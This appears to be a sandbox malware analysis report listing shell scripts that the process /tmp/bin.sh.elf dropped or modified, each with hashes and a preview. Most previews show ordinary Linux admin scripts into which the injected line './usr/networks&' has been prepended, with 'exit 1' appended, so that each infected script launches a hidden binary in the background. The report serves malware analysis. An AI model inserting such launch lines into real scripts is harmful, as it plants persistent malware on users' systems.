                                                                        SSDEEP:192:/i038ZMHCJtcyzyBgVQlyzcvXGC7tq5bM7YKBKjI7YYI:ZCbdHVQ+ceJE7+
                                                                        MD5:1C808D280E8DF536EFBE3AB9EC6A1AE4
                                                                        SHA1:28B08E23FC817DF4A67AD544B8D56F6947AB2A56
                                                                        SHA-256:706BDD06879A99096A874915BB81A179F3455DC1B29C2F01C54DB26197B05786
                                                                        SHA-512:1EDD029A4300324FF3D9E458B2F054F5D60231BA3E4EF374F5F20A11117E0DD4EC3AC3FDBB1AAF38800562E67BC473FDF66E2485350C8CB5565A3048FD91E2A5
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..cd "$(dirname "$0")"/../.. ||.die "Could not cd to top-level directory"..mkdir -p .vscode ||.die "Could not create .vscode/"..# General settings..cat >.vscode/settings.json.new <<\EOF ||.{. "C_Cpp.intelliSenseEngine": "Default",. "C_Cpp.intelliSenseEngineFallback": "Disabled",. "[git-commit]": {. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 72. },. "[c]": {. "editor.detectIndentation": false,. "editor.insertSpaces": false,. "editor.tabSize": 8,. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 80,. "files.trimTrailingWhitespace": true. },. "files.associations": {. "*.h": "c",. "*.c": "c". },. "cSpell.ignorePaths": [. ],. "cSpell.words": [. "DATAW",. "DBCACHED",. "DFCHECK",. "DTYPE",. "Hamano",. "HCAST",. "HEXSZ",. "HKEY",. "HKLM",. "IFGITLINK",. "IFIN
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):617
                                                                        Entropy (8bit):4.789300168717738
                                                                        Encrypted:false
                                                                        SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                        MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                        SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                        SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                        SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1015
                                                                        Entropy (8bit):4.896629241453442
                                                                        Encrypted:false
                                                                        SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                        MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                        SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                        SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                        SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):266
                                                                        Entropy (8bit):4.736279036741599
                                                                        Encrypted:false
                                                                        SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                        MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                        SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                        SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                        SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2712
                                                                        Entropy (8bit):5.4524991837552035
                                                                        Encrypted:false
                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                        MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                        SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                        SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                        SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2564
                                                                        Entropy (8bit):5.346461718403454
                                                                        Encrypted:false
                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                        MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                        SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                        SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                        SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):893
                                                                        Entropy (8bit):4.754860515157645
                                                                        Encrypted:false
                                                                        SSDEEP:12:20a8PvpwsNE8rKpVXExGG3S69V43usL7XEwoARsVXniVXtgf4VXEt7Fs05fjgn:nlwsWAZDV4eg4w4c6Xjg
                                                                        MD5:8B937F22608AE7DB9A71801A5EAF7985
                                                                        SHA1:A968811F781A1FA33F18E4F9D23D66E805C926FE
                                                                        SHA-256:6D8F85A7D902E1B248753FCA7CC85C39228CC50A872436BB4CEF9276F36D97C9
                                                                        SHA-512:07AC35203AF776710809196B92DCF3CF9357C1689B627F7C9146E0B3EFD0B6B47FEF4FE0036AF1C6CABA5854E88AEB576B666C6C8B2E6AD998A143BD5C10E292
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# behaviour on exit, which resets default colors again...# print grid of all colors and brightnesses.python demo01.py..# Simple demo of changing foreground, background and brightness..python demo02.py..# Demonstrate the different behavior when autoreset is True and False..python demo03.py..# check that stripped ANSI in redirected stderr does not affect stdout.rm -f demo04.out.python demo04.py 2> demo04.out.cat demo04.out.rm -f demo04.out..# Demonstrate the difference between colorama initialized with wrapping on and off..python demo05.py..# Demonstrate printing colored, random characters at random positions on the screen.python demo06.py..# Demonstrate cursor relative movement: UP, DOWN, FORWARD, and BACK in colorama.CURSOR.python demo07.py..# Demonstrate the use of a context manager instead of manually using init and deinit.python demo08.py../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):824
                                                                        Entropy (8bit):4.411576521686501
                                                                        Encrypted:false
                                                                        SSDEEP:12:VFfxfNiNBxMZhLs/jMeZ0aMLlhLyljfBeZ0fjIClAMZhLecdj6RujrZy1Tn:ZNmGLsvZ7kLyqZSIxGLf6oZU
                                                                        MD5:CDDCC0755668278EDB780BD4EF65C45E
                                                                        SHA1:E66315D7E1B40196A94DB2127F021CB697ADA242
                                                                        SHA-256:9FC0A0139AE67EEC0EBB42A89C440F1B7E181E54F21B3D2B965E83B91A4E1C6E
                                                                        SHA-512:46090B4B7D308552BB28324E6963AF21F769677483336135831E5CC405EF58267440951018BBBFC773EB6302BC9DCEA27620399DB25E3FE1510BC1232B131CC3
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.test -f $DAEMON || exit 0..set -e..case "$1" in. start). echo -n "Starting $DESC: ". $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. stop). echo -n "Stopping $DESC: ". start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid. # \ --exec $DAEMON. echo "$NAME.". ;;. restart|force-reload). echo -n "Restarting $DESC: ". start-stop-daemon --stop --quiet --pidfile \. /var/run/$NAME.pid. # --exec $DAEMON. sleep 1. $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. *). N=/etc/init.d/$NAME. echo "Usage: $N {start|stop|restart|force-reload}" >&2. exit 1. ;;.esac..exit 0.../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2239
                                                                        Entropy (8bit):4.714198727897739
                                                                        Encrypted:false
                                                                        SSDEEP:48:iBs/sdCu3uQzixZ9sIJyLjs/VhNO4HO0HszTKrBLeVXcR/d4Z+syfIZfwiQEw9r1:iBsEsFuIuGyK9eVX+uZ+syfIZfwiQEwr
                                                                        MD5:ADE364831C18F9ABBF6C3B6F050F7759
                                                                        SHA1:E1DC95E5FB2431D03A47FAE4C2B2B54B8945CD6E
                                                                        SHA-256:2F2441308AA69227E7193D1F3C91BF0B61AB27B1D553C810462FBF35490A5194
                                                                        SHA-512:359FA168A4BF7C20436DAFAC5C9C438327B6C994C75CC4C488EA0FFE440F71F6776CDDEAE801D86E3783214EC32E348D5C1994B006E0265608055FCDA423EDBA
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. h|-help) usage ; exit 0 ;;. s|-second) kk=${key2} ;;. vvv) verbose="-vvv" ;;. vv) verbose="-vv" ;;. v|-verbose) verbose="-v" ;;. *) echo "Unknown option: -$opt " ; exit 1 ;;. esac. shift. opt="$1".done..if [ $# -lt 1 ]. then. usage. exit 1.fi..echo ">>> try to report capabilities:".sg_persist -c ${verbose} "$1".res=$?.case "$res" in. 0) ;;. 1) echo " syntax error" ;;. 2) echo " not ready" ;;. 3) echo " medium error" ;;. 5) echo " illegal request, report capabilities not supported?" ;;. 6) echo " unit attention" ;;. 9) echo " illegal request, Persistent Reserve (In) not supported" ;;. 11) echo " aborted command" ;;. 15) echo " file error with $1 " ;;. 20) echo " no sense" ;;. 21) echo " recovered error" ;;. 33) echo " timeout" ;;. 97) echo " response fails sanity" ;;. 98) echo " other SCSI error" ;;. 99) echo " other error" ;;. *) echo " unknown exit status for sg_persist: $res" ;
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):837
                                                                        Entropy (8bit):5.302563134496065
                                                                        Encrypted:false
                                                                        SSDEEP:12:cnghJ15N5jKJQlw6vWcWwH8QoFIr8zAZjF/6wQ8+WepqKUZ0N5JrHYV5N5jKUVcv:MK5NworhH83Igsv/6j59I0Nv05NwHeX4
                                                                        MD5:6F4CEFE8C604AF13A0E95B1A624268E0
                                                                        SHA1:95D3589209627FA8249BA32D78B11DC6E9E0B94E
                                                                        SHA-256:D30D1E9E6DD28C9CCC349B9781744F88B1A023052B98C10CC44427DC13A01157
                                                                        SHA-512:BA36E3FB93776A05AAE8CD731DC90D05CC04F4A1F76A141CEAE46EDBEDA4A02B8A20088CBF395985447C870ACC7CF2A6066A1C55D6A6B339AD7381B4973177A6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null..fi.else..exit 1.fi...USAGE=`du -c $LOG_DIR 2>/dev/null |grep total |cut -d't' -f1`..# Clears the logs if size is greater than specified limit.while [ $USAGE -gt $MAXSIZE ]; do...# changing the user specified LOGFILE_DAYS days to 1 days lesser...LOGFILE_DAYS=`expr $LOGFILE_DAYS "-" 1`...# If same day logs are reaching Max size, deleting all log files...if [ $LOGFILE_DAYS -eq 0 ]; then...find $LOG_DIR -type f -name hp-\* -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null...break..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null..fi..USAGE=`du -c $LOG_DIR 2>/dev/null |grep total |cut -d't' -f1`.done../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5640
                                                                        Entropy (8bit):5.075171234163134
                                                                        Encrypted:false
                                                                        SSDEEP:96:EndUdULCUP+WucEeLvUmp3qFvUnxEX3ZmXQfVStPDVYt4cI0pNZQ89LKVSTzCKwN:OUdULCUPSeLvUDNUxGZgQfVSDVTM79W7
                                                                        MD5:E91743F1831D7CE024336A919713390C
                                                                        SHA1:0A53FF0AFE70ADA2538643A69DD332CEF8B9CDA7
                                                                        SHA-256:72F50ACEC6CFB58D01899D4A8F64573DDF80B3A57DAF4EE9CE4B403873DF887E
                                                                        SHA-512:4C8CCAC875528A73D8113202A887EB009B258DB4A80233073ABC9F46AB21ECAB2937B3EA3FEB794ED2229BF3273E95D9B73073EB8990DDDC8AC9C8DCE161CF0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# because function is not supposed to exit error codes..fs_type () {..local fstype=""..if (export PATH="/lib/udev:$PATH"; type vol_id) >/dev/null 2>&1; then...PATH="/lib/udev:$PATH" \....fstype=$(vol_id --type "$1" 2>/dev/null || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..if type lsblk >/dev/null 2>&1 ; then...fstype=$(lsblk --nodeps --noheading --output FSTYPE -- "$1" || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..if type blkid >/dev/null 2>&1; then...fstype=$(blkid -o value -s TYPE "$1" 2>/dev/null || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..echo "NOT-DETECTED".}..is_dos_extended_partition() {..if type blkid >/dev/null 2>&1; then...local output....output="$(blkid -o export $1)"....# old blkid (util-linux << 2.24) errors out on extended p....if [ "$?" = "2" ]; then....return 0...fi....# dos partition type and no filesystem type?......if echo $output | grep -q ' PTTYPE=dos ' &&.....! echo $output | grep -q ' TYPE=';
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):407
                                                                        Entropy (8bit):4.430546624952678
                                                                        Encrypted:false
                                                                        SSDEEP:12:axuI47jZ9yPM/o47jZ9yPaLaAl5IYkWbWCGcxQuuiC/5s8n:CuI4fZV/o4fZjWqPC2Qu8/e8
                                                                        MD5:B133FEA1865145C4491358207DE1C0DB
                                                                        SHA1:30DC19C478A0D59E9C03DFB99D59AA67B4E706C3
                                                                        SHA-256:01BB6F1F7C079F3702E616E15548F3EF4BDF7D8594F6E4873964476159BD54FB
                                                                        SHA-512:138AF43BDB49654CEAB6498CAF1D747E4698CCCC135F095E093FEADA7031DB119EAF820E4661DB2B0104E2863F3A36C5D9EB5464E73E287CFCC61BD8603CE79E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit. fi. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' -. else. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@". fi.else. # Output is not a terminal, cat arguments or stdin. if test $# = 0; then. if test -t 0; then. echo "Missing filename" 1>&2. exit. fi. cat. else. cat "$@". fi.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):179
                                                                        Entropy (8bit):4.813555283479331
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVay6vUZ6aAcvZ6sF5b2FpJRJUGE7zsjZ2FPYRKYUGE7zQvvvLQVOORgn:w6vUFAcvgfvRxgA4QRxgUv3LPn
                                                                        MD5:693F623F27A2CF8623A4ACEECD20DA9F
                                                                        SHA1:7A52B6AA1A47433B259D4699D86A6840C5E02D78
                                                                        SHA-256:EC43854908E92A14857A8845EB89F8C64DBFC7856BC23AA1F82BD2A75097EB2C
                                                                        SHA-512:01E779F1F569BBEED68AC5EE6C99FD558F003C3166B5F5FA0ED29F512D45AF03378F0708E359009DF3567E4EE003ED7DB395C854EF045F8A51901788A996F290
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..grep major-152 $f >/dev/null.if [ $? = 1 ]; then..echo alias block-major-152 aoe >> $f..echo alias char-major-152 aoe >> $f.fi.../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):315
                                                                        Entropy (8bit):4.844907937025013
                                                                        Encrypted:false
                                                                        SSDEEP:6:wSWl0ARIP9cDhussXcAJWAbM+tCACzYsavu/C5VKSChR5bm026qyAJpl8LAhn:wvVuXFmYs1/LSChqmqfJs0hn
                                                                        MD5:43C4BF1017D72A45F95FB685FCECCF9A
                                                                        SHA1:B78469C2F587A3E6A4BB591385D5D721B8B829C0
                                                                        SHA-256:9A041A6D5102D1416B1616B4C13791F3ED00DE305DDE32E5E2233A85E5ACCD45
                                                                        SHA-512:A7D1050FDBF4BA02AD9DDE5E09895C89469439DBD0FE8B9639B1A91802AF96D03ED5D202BAF8354D49D4B9C4489E3B60616A76CEEE8C4924FB8C428C554526FC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..for d in `ls -d $sysd/block/etherd* 2>/dev/null | grep -v p` end; do..# maybe ls comes up empty, so we use "end"..test $d = end && continue...dev=`echo "$d" | sed 's/.*!//'`..printf "$format" \..."$dev" \..."`cat \"$d/netif\"`" \..."`cat \"$d/state\"`".done | sort../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):427
                                                                        Entropy (8bit):4.897324371958306
                                                                        Encrypted:false
                                                                        SSDEEP:12:chnJjBFcVAFBzKJ+NT7+J+900EV/+/gLl60k6XxVjpInPn:CdB6qFBGYNP+JO00e/MilNVFInP
                                                                        MD5:9E74B9DB16052AAFD66DC8BE8F3A69F4
                                                                        SHA1:A18ADC7A4062900F79D8DBE4430F53E17D0D4B42
                                                                        SHA-256:E4ECBF6B5F68F1DB22C13E934EE409855502080D2089DA534A39E9C73E76139B
                                                                        SHA-512:3FD605D3E7879DAAC636A01B8373A179796FF60070BCF9975844FC40217A4399B74DA8F345F3F28189CC82C5FFF26715A7D23DDECC0A42E1E794EE3A279B12E6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....exit 1...fi..fi.fi..# find the directory where udev rules are stored, often.# /etc/udev/rules.d.#.rules_d="`sed -n '/^udev_rules=/{ s!udev_rules=!!; s!\"!!g; p; }' $conf`".if test -z "$rules_d" ; then..rules_d=/etc/udev/rules.d.fi.if test ! -d "$rules_d"; then..echo "$me Error: cannot find udev rules directory" 1>&2..exit 1.fi.sh -xc "cp `dirname $0`/udev.txt $rules_d/60-aoe.rules"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
